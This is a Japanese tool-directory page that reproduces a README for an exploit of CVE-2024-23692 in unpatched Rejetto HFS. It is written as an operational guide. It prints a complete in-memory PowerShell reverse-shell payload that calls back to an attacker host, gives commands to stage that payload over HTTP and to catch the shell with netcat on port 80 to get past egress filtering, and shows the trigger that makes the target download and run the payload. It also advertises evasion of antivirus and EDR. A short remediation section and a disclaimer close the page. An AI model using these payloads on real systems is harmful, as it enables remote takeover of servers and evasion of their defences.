Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-23692 — 未パッチの Rejetto HFS に対する CVE-2024-23692 の悪用を自動化。インメモリ PowerShell リバースシェル、HTTP ペイロードステージング、AV/EDR のディスク書き込み回避を備え、認可されたレッドチーム演習向け。 | Kitploit
ツール/GitHubGitHub/sandimfz/cve-2024-23692
ペイロード生成エクスプロイトウェブアプリケーション悪用コマンド&コントロールレッドチーミング
GitHubsandimfz/cve-2024-23692

CVE-2024-23692

未パッチの Rejetto HFS に対する CVE-2024-23692 の悪用を自動化。インメモリ PowerShell リバースシェル、HTTP ペイロードステージング、AV/EDR のディスク書き込み回避を備え、認可されたレッドチーム演習向け。

リポジトリを見る
171ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-23692 - Rejetto HFS リモートコード実行 (RCE)

CVE-2024-23692 に関する戦術的ドキュメントおよびエクスプロイトガイド。これは、Rejetto HTTP File Server (HFS) の 2.3m より前のバージョンに影響を与える、認証不要の重大なリモートコード実行 (RCE) 脆弱性です。本ガイドでは、インメモリ・リバースシェル (RAM のみ) 技術を活用し、シグネチャベースのアンチウイルス/EDR によるディスク書き込み検知を回避します。

免責事項: 本リポジトリおよびその内容は、認可されたセキュリティ評価、ペネトレーションテスト、バグバウンティのシミュレーション、および防御的フォレンジック監査に厳密に限定して使用されることを意図しています。第三者環境に対する未認可の使用は厳格に違法です。


クレジットと参考文献

本概念実証ワークフローで実装されている自動検証テンプレートは、以下の公開リポジトリを基に構築されています:

  • エクスプロイトスクリプトのソース: VeryLazyTech - CVE-2024-23692

エクスプロイトワークフロー (インメモリ・リバースシェル)

この手法は、HTTP ステージャー配置モデルを採用し、テキストベースのペイロード文字列を動的にターゲット環境に配信し、システムの揮発性メモリ (RAM) から直接ライブ実行を呼び出します。

ステップ 1: ペイロードスクリプトのステージング

ローカルの C2/攻撃者サーバー上で、index.html という名前の静的テキストファイルを作成し、以下のコア PowerShell TCP ソケットループコードを記述します:

\$c = New-Object System.Net.Sockets.TCPClient('<LHOST>',80);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){;\$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i);\$sb = (iex \$d 2>&1 | Out-String );\$sb2 = \$sb + 'PS ' + (pwd).Path + '> ';\$sbt = ([text.encoding]::ASCII).GetBytes(\$sb2);\$s.Write(\$sbt,0,\$sbt.Length);\$s.Flush()};\$c.Close()

ステップ 2: 軽量 Web サーバーの起動

ペイロードテンプレートファイルを含む指定のステージングフォルダ内でターミナルインスタンスを開き、代替ポート (例: 8080) で即座に Python HTTP リスナーを起動します:

python3 -m http.server 8080

ステップ 3: ネットワークリスナーの初期化

受信する永続シェルコールバックをホストするために、2 つ目の独立したターミナルセッションを開きます。送信境界保護対策 (Egress Firewall Filtering) を容易に回避するために、ポート 80 (または 443) を活用することを強く推奨します:

sudo nc -lvnp 80

ステップ 4: RCE エクスプロイトのトリガー

デプロイメントインフラストラクチャを対象に、自動検証エンジンを発射します。ターゲット呼び出しは、パラメータフラグを落とすことなく最適な文字列安定性を維持するために、ローカライズされた CMD 実行ラッパーを介してコマンド解析をフックします:

./CVE-2024-23692.sh http://<TARGET_IP>:<PORT> "cmd /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>')\""

Screenshot

修復と緩和

侵害を完全に除去し、脆弱な運用環境を修復するには:

  1. システムツリー全体で実行中の Rejetto HFS デプロイメントプロセスを即座に停止および終了します:
    Get-Process -Name *hfs* | Stop-Process -Force
    
  2. パブリック書き込み領域内に存在する残留ゴミファイルまたは未認証のバイナリペイロードを削除します:
    Remove-Item -Path "C:\Users\Public\*.exe" -Force -ErrorAction SilentlyContinue
    
  3. デプロイメント資産をパッチ適用済みの安定リリースバージョンにアップグレードするか、統合インフラストラクチャを最新の安全な代替プラットフォームに移行します。
ツールをダウンロード